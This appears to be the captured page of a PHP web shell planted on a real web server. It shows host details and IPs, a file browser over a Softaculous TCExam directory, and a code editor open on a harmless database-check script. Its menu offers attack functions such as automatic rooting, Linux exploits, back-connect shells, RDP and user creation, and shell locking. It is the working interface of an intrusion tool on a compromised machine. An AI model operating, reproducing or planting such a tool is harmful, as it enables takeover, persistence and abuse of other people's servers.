Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
tcexam /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
changelog.txt
2.65
KB
-rw-r--r--
check_utf8.php
1.07
KB
-rw-r--r--
clone.php
5.46
KB
-rw-r--r--
edit.php
4.96
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.39
KB
-rw-r--r--
fileindex.php
644
B
-rw-r--r--
import.php
3.35
KB
-rw-r--r--
info.xml
2.48
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.92
KB
-rw-r--r--
install.xml
750
B
-rw-r--r--
md5
1.85
KB
-rw-r--r--
notes.txt
1.45
KB
-rw-r--r--
tce_config.php
5.94
KB
-rw-r--r--
tce_config_.php
7.36
KB
-rw-r--r--
tce_db_config.php
4.12
KB
-rw-r--r--
tce_general_constants.php
2.46
KB
-rw-r--r--
tce_paths.php
4.72
KB
-rw-r--r--
update_pass.php
298
B
-rw-r--r--
upgrade.php
5.28
KB
-rw-r--r--
upgrade.xml
381
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check_utf8.php
<?php /** * Does the database server claim to have support for UTF-8 Multibyte (utf8mb4) collation? * * libmysql supports utf8mb4 since 5.5.3 (same version as the MySQL server). mysqlnd supports utf8mb4 since 5.0.9. * * @return boolean * * @since CMS 3.5.0 */ function serverClaimsUtf8mb4Support() { $client_version = mysqli_get_client_info(); if (strpos($client_version, 'mysqlnd') !== false) { $client_version = preg_replace('/^\D+([\d.]+).*/', '$1', $client_version); return version_compare($client_version, '5.0.9', '>='); } else { return version_compare($client_version, '5.5.3', '>='); } } /** * Get the version of the database connector. * * @return string The database connector version. * * @since 12.1 */ function getVersion() { $con = mysqli_connect("[[softdbhost]]","[[softdbuser]]","[[softdbpass]]","[[softdb]]"); return mysqli_get_server_info($con); } $serverClaimsUtf8mb4Support = serverClaimsUtf8mb4Support(); if(!empty($serverClaimsUtf8mb4Support)){ echo '<claim_utf8>utf8mb4</claim_utf8>'; } ?>
Close